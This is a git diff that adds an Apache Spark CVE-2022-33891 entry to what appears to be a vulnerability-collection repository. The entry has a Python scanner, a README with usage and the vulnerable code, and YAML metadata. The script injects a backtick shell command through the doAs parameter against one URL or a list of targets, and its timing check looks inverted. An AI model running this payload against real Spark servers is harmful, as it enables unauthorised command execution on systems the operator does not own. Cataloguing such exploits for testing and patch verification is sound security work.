diff --git a/cve/apache-Spark/2022/CVE-2022-33891/CVE-2022-33891.py b/cve/apache-Spark/2022/CVE-2022-33891/CVE-2022-33891.py
new file mode 100644
index 0000000000000000000000000000000000000000..c030eed10ea6f4043ef99820d51d973ca2af6af6
--- /dev/null
+++ b/cve/apache-Spark/2022/CVE-2022-33891/CVE-2022-33891.py
@@ -0,0 +1,75 @@
+import requests
+import argparse
+
+def banner():
+    print('''\033[0;34m
+ _____ _   _ _____       _____  _____  _____  _____       _____  _____ _____  _____  __  
+/  __ \ | | |  ___|     / __  \|  _  |/ __  \/ __  \     |____ ||____ |  _  ||  _  |/  | 
+| /  \/ | | | |__ ______`' / /'| |/' |`' / /'`' / /'______   / /    / /\ V / | |_| |`| | 
+| |   | | | |  __|______| / /  |  /| |  / /    / / |______|  \ \    \ \/ _ \ \____ | | | 
+| \__/\ \_/ / |___      ./ /___\ |_/ /./ /___./ /___     .___/ /.___/ / |_| |.___/ /_| |_
+ \____/\___/\____/      \_____/ \___/ \_____/\_____/     \____/ \____/\_____/\____/ \___/
+                                                                                         
+                           \033[0;34m[\033[0;37mScript coded by Amolo Hunters\033[0;34m]
+    ''')
+
+def urlexploit(url):
+    if arguments.valid:
+        try:
+            r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
+            if r.elapsed.total_seconds() <= 8:
+                print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
+        except:
+            print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
+            pass
+    else:
+        try:
+            r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
+            if r.elapsed.total_seconds() <= 8:
+                print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
+            else:
+                print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')
+        except:
+            print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
+            pass
+
+def listexploit(file):
+    if arguments.valid:
+        f = open(file, 'r').read().splitlines()
+        for url in f:
+            try:
+                r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
+                if r.elapsed.total_seconds() <= 8:
+                    print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
+                else:
+                    print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')
+            except:
+                print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
+                pass
+    else:
+        f = open(file, 'r').read().splitlines()
+        for url in f:
+            try:
+                r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
+                if r.elapsed.total_seconds() <= 8:
+                    print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
+                else:
+                    print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')
+            except:
+                print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
+                pass
+
+def main():
+    banner()
+    if arguments.turl:
+        urlexploit(arguments.turl)
+    if arguments.tlist:
+        listexploit(arguments.tlist)
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u','--url', action='store', help='target url', dest='turl', required=False)
+    parser.add_argument('-l','--list', action='store', help='targets list', dest='tlist', required=False)
+    parser.add_argument('-v', '--valid', action='store_true', help='only valid targets', dest='valid', required=False)
+    arguments = parser.parse_args()
+    main()
diff --git a/cve/apache-Spark/2022/CVE-2022-33891/README.md b/cve/apache-Spark/2022/CVE-2022-33891/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..96337218e49034645f1886509eff9e9dee9e453a
--- /dev/null
+++ b/cve/apache-Spark/2022/CVE-2022-33891/README.md
@@ -0,0 +1,37 @@
+<h1 align="center">「💥」CVE-2022-33891</h1>
+
+<p align="center"><img height="200" src="https://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/Apache_Spark_logo.svg/2560px-Apache_Spark_logo.svg.png"></p>
+
+## Description
+
+The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
+
+### Vulnerable Code
+
+```
+private def getUnixGroups(username: String): Set[String] = {
+    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
+    // we need to get rid of the trailing "\n" from the result of command execution
+    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+}
+```
+
+* https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41
+
+## Demo
+
+![demo](demo.png)
+
+## Usage
+
+```
+pip install requests
+git clone https://github.com/AmoloHT/CVE-2022-33891
+cd CVE-2022-33891
+python3 CVE-2022-33891.py -u http://TARGET.TLD
+```
+
+## Reference
+
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33891
+* https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc
diff --git a/cve/apache-Spark/2022/CVE-2022-33891/demo.png b/cve/apache-Spark/2022/CVE-2022-33891/demo.png
new file mode 100644
index 0000000000000000000000000000000000000000..1927e5e0110690e159c75a55907c6bd404c4d696
Binary files /dev/null and b/cve/apache-Spark/2022/CVE-2022-33891/demo.png differ
diff --git a/cve/apache-Spark/2022/yaml/CVE-2022-33891.yaml b/cve/apache-Spark/2022/yaml/CVE-2022-33891.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..7f97b3a3649b026be746d3e0c0639d09640b92df
--- /dev/null
+++ b/cve/apache-Spark/2022/yaml/CVE-2022-33891.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-33891
+source: https://github.com/AmoloHT/CVE-2022-33891
+info:
+  name: Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。
+  severity: High
+  description: |
+    Apache Spark用户界面提供了通过配置选项spark.acls.enable来启用ACL的可能性。通过认证过滤器可以检查一个用户是否有查看或修改应用程序的访问权限。如果启用了ACL，HttpSecurityFilter中的代码路径允许某人通过提供任意的用户名来进行冒充。然后，一个恶意的用户可能会到达一个权限检查函数，最终根据他们的输入建立一个Unix shell命令，并执行它。这将导致以Spark当前运行的用户身份执行任意的shell命令。
+  scope-of-influence:
+    Apache Spark 3.0.3及更早的版本，Apache Spark 3.1.1-3.1.2，Apache Spark 3.2.0-3.2.1
+  reference:
+    - http://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html
+    - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-33891
+    cwe-id: CWE-77
+    cnvd-id: None
+    kve-id: None
+  tags: execute code
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f822acc2b69f179a6e97f17564d06e258e4fe60d..d0c03f47e24224077c968cfaadfa19f74c8ce72e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -8,6 +8,8 @@ cve:
     - CVE-2022-24112
   apache-solr:
     - CVE-2021-27905
+  apache-Spark:
+    - CVE-2022-33891
   linux-kernel:
     - CVE-2021-4204
     - CVE-2021-22555